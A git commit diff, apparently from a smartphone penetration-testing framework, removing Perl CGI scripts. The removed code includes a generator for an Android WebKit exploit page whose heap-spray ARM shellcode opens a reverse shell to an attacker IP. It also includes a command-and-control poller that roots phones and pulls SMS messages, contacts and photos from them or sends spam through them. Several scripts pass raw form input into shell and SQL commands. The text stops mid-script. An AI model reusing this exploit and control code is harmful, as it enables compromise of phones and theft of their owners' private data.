
pulled gui for patches

1 parent 16310b4 commit ee55179a8353f46f9a1bb032e66a61f00c3f13e6 @georgiaw committed Oct 24, 2012
BIN frameworkgui/AndroidAgent.apk
Binary file not shown.
83 frameworkgui/CSAttack.pl
@@ -1,83 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$exploit = $FORM{"exploit"};
-$hPath = $FORM{"hostingPath"};
-$fileName = $FORM{"fileName"};
-$phNo2Attack = $FORM{"phNo2Attack"};
-$modemNo = $FORM{"modemNoDD2"};
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-#print "Content-type: text/html\r\n\r\n";
-$webserver = $Variables{"WEBSERVER"};
-
-$Variables{"OS"} = $^O;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $selectquery = "SELECT id from modems where number=" . "\'" . $modemNo . "\'";
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $selectquery = "SELECT id from modems where number=" . $modemNo;
-
- }
-
- $sql = $dbh->prepare($selectquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
-$startcommand = "perl androidwebkit.pl " . $hPath . " " . $fileName . " " . $phNo2Attack . " " . $modem;
- $pid = fork;
- die "fork failed" unless defined $pid;
- if ($pid ==0)
- {
-
- system($startcommand);
-
-
- }
-
-
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
80 frameworkgui/SEAttack.pl
@@ -1,80 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$platform = $FORM{"platformDD2"};
-$path = $FORM{"hostingPath"};
-$filename = $FORM{"fileName"};
-$number = $FORM{"phNo2Attack"};
-$modemNo = $FORM{"modemNoDD2"};
-
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-#print "Content-type: text/html\r\n\r\n";
-$webserver = $Variables{"WEBSERVER"};
-
-$Variables{"OS"} = $^O;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
-
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
-
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
-$selectquery = "SELECT id from modems where number=" . "\'" . $modemNo . "\'";
- $sql = $dbh->prepare($selectquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
-$startcommand = "perl directdownload.pl " . $path . " " . $filename .
-" " . $number . " " . $platform . " " . $modem;
- $pid = fork;
- die "fork failed" unless defined $pid;
- if ($pid ==0)
- {
-
- system($startcommand);
-}
-#print $startcommand;
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
664 frameworkgui/agentpoll.pl
@@ -1,664 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-use Expect;
-use IO::Socket;
-$configfile = "config";
- open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
-$ipaddress = $Variables{"IPADDRESS"};
-$webserver = $Variables{"WEBSERVER"};
-$path = $ARGV[0];
-$key = $ARGV[1];
-$id = $ARGV[2];
-$sqlserver = $Variables{"MYSQLSERVER"};
-while(1)
- {
- $fullpath5 = $webserver . $path . "/putfunc";
- open(PUTFILE, "+<$fullpath5");
- $line= <PUTFILE>;
- close(PUTFILE);
- open(PUTFILE2, ">$fullpath5");
- print PUTFILE2;
- close(PUTFILE2);
- $catcommand = "cat " . $fullpath5 . " | sed '1d' > hold";
- system($catcommand);
- $catcommand2 = "mv hold " . $fullpath;
- system($catcommand);
- @split = split(/ /, $line);
- if (@split[0] eq $key)
- {
- if (@split[1] eq "ROOT")
- {
- $delivery = @split[2];
- chomp($delivery);
- $command = $key . " " . "ROOT";
- if ($delivery eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- if ($line eq "Root Succeeded")
- {
- $table = "data";
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $yes = "yes";
- $insertquery = "UPDATE $table SET root=" . "'" . $yes . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- }
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
- if ($delivery eq "SMS")
- {
- $modem = @split[3];
- chomp($modem);
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- if ($line eq "Root Succeeded")
- {
- $table = "data";
- $yes = "yes";
- $insertquery = "UPDATE $table SET root=" . "'" . $yes . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- }
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
-
- }
-
-
- }
- elsif (@split[1] eq "PICT")
- {
- $delivery = @split[2];
- chomp($delivery);
- $command = $key . " " . "PICT";
- if ($delivery eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 30;
- $picturefile = $webserver . $path . "/picture.jpg";
- open(PICTURE, "+<$picturefile");
- if (!(-z PICTURE))
- {
- $command = "cp" . " " . $picturefile . " " . ".";
- system($command);
- $picturedir = getcwd();
- $table = "data";
- $picture = $picturedir . "/" . "picture.jpg";
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $insertquery = "UPDATE $table SET picture=" . "'" . $picture . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(PICTURE);
- open(PICTURE2, ">$picturefile");
- print PICTURE2 "";
- close(PICTURE2);
- }
-
- }
- if ($delivery eq "SMS")
- {
- $modem = @split[3];
- chomp($modem);
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep(60);
- $picturefile = $webserver . $path . "/picture.jpg";
- open(PICTURE, "+<$picturefile");
- if (!(-z PICTURE))
- {
- $command = "cp" . " " . $picturefile . " " . ".";
- system($command);
- $picturedir = getcwd();
- $table = "data";
- $picture = $picturedir . "/" . "picture.jpg";
- $insertquery = "UPDATE $table SET picture=" . "'" . $picture . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(PICTURE);
- open(PICTURE2, ">$picturefile");
- print PICTURE2 "";
- close(PICTURE2);
- }
-
- }
- }
- elsif (@split[1] eq "SMSS")
- {
- $deliverymethod = @split[2];
- $returnmethod = @split[3];
- chomp($returnmethod);
- if ($returnmethod eq "SMS")
- {
- $modem = @split[4];
- chomp($modem);
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $command = $key . " " . "SMSS" . " " . $returnmethod;
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path2 . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET sms=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
- if ($deliverymethod eq "SMS")
- {
- print "SMS";
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path2 . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET sms=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
- }
- if ($returnmethod eq "HTTP")
- {
- $command = $key . " " . "SMSS" . " " . "WEB";
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 30;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $insertquery = "UPDATE $table SET sms=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- $sql->execute;
- }
- if ($deliverymethod eq "SMS")
- {
- $modem = @split[4];
- chomp($modem);
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET sms=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
- }
-
- }
- elsif (@split[1] eq "CONT")
- {
- $deliverymethod = @split[2];
- $returnmethod = @split[3];
- chomp($returnmethod);
- if ($returnmethod eq "SMS")
- {
- $modem = @split[4];
- chomp($modem);
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $command = $key . " " . "CONT" . " " . $returnmethod;
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path2 . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET contacts=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
-
-
- }
- if ($deliverymethod eq "SMS")
- {
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path2 . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET contacts=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
-
-
- }
-
- }
-
- if ($returnmethod eq "HTTP")
- {
- $command = $key . " " . "CONT" . " " . "WEB";
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 30;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $insertquery = "UPDATE $table SET contacts=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
- if ($deliverymethod eq "SMS")
- {
- $modem = @split[4];
- chomp($modem);
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $typequery = "SELECT type from modems where id=" . $modem;
- $sql = $dbh->prepare($typequery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $type2 = @rows[0];
- if ($type2 eq "app")
- {
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command; $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET contacts=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
-
- }
- }
-
- }
- elsif (@split[1] eq "SPAM")
- {
- $modem = @split[2];
- $sendnumber = @split[4];
- $deliverymethod = @split[3];
- $splitlength = @split;
- $end = $splitlength - 1;
- $sendmessage = @split[5];
- if ($end > 5)
- {
- for ($i = 6; $i<=$end; $i++)
- {
- $sendmessage .= " ";
- $sendmessage .= @split[$i];
- }
- }
- $command = $key . " " . "SPAM" . " " . $sendnumber . " " . $sendmessage;
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- }
- if ($deliverymethod eq "SMS")
- {
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $typequery = "SELECT type from modems where id=" . $modem;
- $sql = $dbh->prepare($typequery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $type2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- chomp($type2);
- if ($type2 eq "app")
- {
- $control = $webserver . $path2 . "/getfunc";
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- }
- }
-
-
- }
-
-
- }
-}
-
155 frameworkgui/androidwebkit.pl
@@ -1,155 +0,0 @@
-#!/usr/bin/perl
-use Cwd;
-use DBI;
-use Expect;
-use IO::Socket;
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$webserver = $Variables{"WEBSERVER"};
- $sqlserver = $Variables{"MYSQLSERVER"};
- $ipaddress = $Variables{"IPADDRESS"};
- $shellipaddress = $Variables{"SHELLIPADDRESS"};
- $path = $ARGV[0];
- $filename = $ARGV[1];
- $number = $ARGV[2];
- $modem = $ARGV[3];
- $link = "http://" . $ipaddress . $path . $filename;
- $fullpath = $webserver. $path;
- $command1 = "mkdir " . $fullpath;
- system($command1);
- $ipaddresscopy = $shellipaddress;
- @octets = split(/\./, $ipaddresscopy);
- $out1 = pack "c", @octets[0];
- $hex1 = unpack "H2" , $out1;
- $out2 = pack "c", @octets[1];
- $hex2 = unpack "H2" , $out2;
- $out3 = pack "c", @octets[2];
- $hex3 = unpack "H2" , $out3;
- $out4 = pack "c", @octets[3];
- $hex4 = unpack "H2" , $out4;
- $sploitfile = $webserver . $path . $filename;
- $command8 = "touch " . $sploitfile;
- system($command8);
- $command9 = "chmod 777 " . $sploitfile;
- system($command9);
- open(SPLOITFILE, ">$sploitfile");
- print SPLOITFILE "<html>\n";
- print SPLOITFILE "<head>\n";
- print SPLOITFILE "<script>\n";
- print SPLOITFILE "var ip = unescape(\"\\u" . $hex2 . $hex1 . "\\u" . $hex4 . $hex3 . "\");\n";
- print SPLOITFILE "var port = unescape(\"\\u3930\");\n";
- print SPLOITFILE "function trigger()\n";
- print SPLOITFILE "{\n";
- print SPLOITFILE "var span = document.createElement(\"div\");\n";
- print SPLOITFILE "document.getElementById(\"BodyID\").appendChild(span);\n";
- print SPLOITFILE "span.innerHTML = -parseFloat(\"NAN(ffffe00572c60)\");\n";
- print SPLOITFILE "}\n";
- print SPLOITFILE "function exploit()\n";
- print SPLOITFILE "{\n";
- print SPLOITFILE "var nop = unescape(\"\\u33bc\\u0057\");\n";
- print SPLOITFILE "do\n";
- print SPLOITFILE "{\n";
- print SPLOITFILE "nop+=nop;\n";
- print SPLOITFILE "} while (nop.length<=0x1000);\n";
- print SPLOITFILE "var scode = nop+unescape(\"\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002\");\n";
- print SPLOITFILE "scode += port;\n";
- print SPLOITFILE "scode += ip;\n";
- print SPLOITFILE "scode += unescape(\"\\u2000\\u2000\");\n";
- print SPLOITFILE "target = new Array();\n";
- print SPLOITFILE "for(i = 0; i < 0x1000; i++)\n";
- print SPLOITFILE "target[i] = scode;\n";
- print SPLOITFILE "for (i = 0; i <= 0x1000; i++)\n";
- print SPLOITFILE "{\n";
- print SPLOITFILE "document.write(target[i]+\"<i>\");\n";
- print SPLOITFILE "if (i>0x999)\n";
- print SPLOITFILE "{\n";
- print SPLOITFILE "trigger();\n";
- print SPLOITFILE "}\n";
- print SPLOITFILE "}\n";
- print SPLOITFILE "}\n";
- print SPLOITFILE "</script>\n";
- print SPLOITFILE "</head>\n";
- print SPLOITFILE "<body id=\"BodyID\">\n";
- print SPLOITFILE "Enjoy!\n";
- print SPLOITFILE "<script>\n";
- print SPLOITFILE "exploit();\n";
- print SPLOITFILE "</script>\n";
- print SPLOITFILE "</body>\n";
- print SPLOITFILE "</html>\n";
- close(SPLOITFILE);
-
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
